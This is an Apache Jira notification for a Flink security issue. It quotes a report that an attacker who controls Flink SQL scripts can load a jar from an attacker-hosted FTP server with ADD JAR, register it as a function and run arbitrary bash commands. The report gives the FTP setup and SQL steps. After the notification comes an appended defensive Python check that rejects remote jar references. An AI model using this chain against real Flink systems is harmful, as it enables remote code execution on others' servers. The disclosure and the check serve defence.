[
https://issues.apache.org/jira/browse/FLINK-32221?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
gaoyu shi updated FLINK-32221:
------------------------------
Priority: Major (was: Critical)
> Attacker can achieve Remote Code Execution when they can control Flink SQL
> script content
> ------------------------------------------------------------------------------------------
>
> Key: FLINK-32221
> URL: https://issues.apache.org/jira/browse/FLINK-32221
> Project: Flink
> Issue Type: Bug
> Environment: all version that support SQL Script.
> Reporter: gaoyu shi
> Priority: Major
> Attachments: image-2023-05-31-14-58-21-800.png,
> image-2023-05-31-14-59-50-875.png
>
>
> Flink SQL script has similar syntax to traditional SQL, which means it also
> suffers from SQL injection vulnerability.
> An attacker can achieve Remote Code Execution when they can control part or
> whole of the Flink SQL script content by the following steps.
> 1. The attacker develops an evil custom Scalar Function class and packages it
> into a jar.
> !image-2023-05-31-14-59-50-875.png|width=721,height=251!
> 2. Run an FTP server on the attacker host, and put the evil jar in it.
>
> {code:bash}
> # install python-ftp-server tool
> pip install python-ftp-server
> # run ftp server
> python3 -m python_ftp_server -d . --ip <public interface ip> -p password
> # copy evil jar to current directory
> cp <evil.jar-path> .
> {code}
> 3. Input the Flink SQL script to trigger code execution, which assumes that
> the attacker can control part or whole of the Flink SQL script through SQL
> injection or other method.
>
>
> {code:sql}
> -- transfer the evil jar from attacker host to victim
> ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
> -- register the evil function into the SQL context
> CREATE FUNCTION EVIL AS 'org.example.Evil';
> -- run any bash command
> SELECT EVIL('<bash command>');
> {code}
>
>
> In summary, this vulnerability allows an attacker to get remote code execution
> through Flink SQL script. After looking at several websites that use Flink,
> it is very common to concat user input into Flink SQL statements, or even
> directly allow users to enter arbitrary Flink SQL scripts to process data.
> I allow that it is not a vulnerability to execute malicious code through
> Flink's web interface to submit a malicious jar package, because developers
> will hide Flink's web interface by default, such as only listening to
> localhost. However, malicious code execution through Flink SQL scripts is
> completely different. Currently, there is no hardening method or default
> configuration that can prevent attackers from using Flink SQL to achieve
> arbitrary code execution.
> Suggestion:
> The 'ADD JAR' command should not be able to load a remote jar, or it should be
> disabled by default at least.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
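A defensive pre-submission check for the behaviour the report describes, added here as an example (not Flink's own code and not from the reporter): it scans a Flink SQL script for jar literals in `ADD JAR` and `CREATE FUNCTION ... USING JAR` statements and refuses any whose location is not a bare filesystem path or a `file://` URI. The local-only policy, the handling of Flink 1.16+ `USING JAR`, and the sample scripts in the test are this example's own assumptions.

```python
"""Refuse Flink SQL scripts that would fetch a jar from a remote location."""
import re
from urllib.parse import urlparse

# Policy (our own assumption, not a Flink setting): only bare paths and file:// URIs are local.
LOCAL_SCHEMES = {"", "file"}
# Matches ADD JAR '<path>' and CREATE FUNCTION ... USING JAR '<path>' [, JAR '<path>'] (Flink 1.16+).
JAR_LITERAL_RE = re.compile(r"(?:\b(?:ADD|USING)\s+|,\s*)JAR\s+'((?:[^']|'')*)'", re.IGNORECASE)


def strip_comments(sql: str) -> str:
    """Drop -- and /* */ comments while copying '...' literals verbatim, so a
    commented-out ADD JAR is ignored but a '--' inside a jar path is kept."""
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] == "'":                       # string literal; '' is an escaped quote
            j = i + 1
            while j < n and not (sql[j] == "'" and sql[j + 1:j + 2] != "'"):
                j += 2 if sql[j:j + 2] == "''" else 1
            out.append(sql[i:j + 1])
            i = j + 1
        elif sql.startswith("--", i):           # line comment runs to end of line
            j = sql.find("\n", i)
            i = n if j < 0 else j
        elif sql.startswith("/*", i):           # block comment; keep a space so tokens stay apart
            j = sql.find("*/", i + 2)
            i = n if j < 0 else j + 2
            out.append(" ")
        else:
            out.append(sql[i])
            i += 1
    return "".join(out)


def remote_jar_references(sql: str) -> list:
    """Return (scheme, path) for every jar literal whose scheme is not local."""
    refs = []
    for m in JAR_LITERAL_RE.finditer(strip_comments(sql)):
        path = m.group(1).replace("''", "'")
        scheme = urlparse(path).scheme.lower()
        if scheme not in LOCAL_SCHEMES:
            refs.append((scheme, path))
    return refs


def is_script_allowed(sql: str) -> bool:
    """Gate for a script-submission endpoint: reject the whole script on any remote jar."""
    return not remote_jar_references(sql)
```

Run this before handing user-supplied SQL to the Flink SQL client or gateway; the returned `(scheme, path)` pairs are also useful as an audit-log record of rejected submissions.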